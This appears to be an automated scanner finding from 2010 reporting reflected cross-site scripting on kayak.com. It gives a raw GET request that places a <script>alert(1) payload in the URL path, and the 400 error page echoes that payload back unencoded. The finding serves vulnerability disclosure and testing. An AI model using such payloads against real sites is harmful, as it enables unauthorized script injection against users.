1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.kayak.com |
Path: | /v349/h/nvtl/califrame |
GET /v3497b826<script>alert(1)< Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; profilerPoints=(%7B |
HTTP/1.1 400 Bad Request Server: Apache Context-Type: text/html Vary: Accept-Encoding Content-Type: text/plain; charset=UTF-8 Date: Sat, 13 Nov 2010 20:43:43 GMT Connection: close Content-Length: 547 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>400 Bad Request</title> </head> <body> <h1>Bad Request</h1> <p> Your browser sent a request that this ser ...[SNIP]... <br> Request: /v3497b826<script>alert(1)< ...[SNIP]... |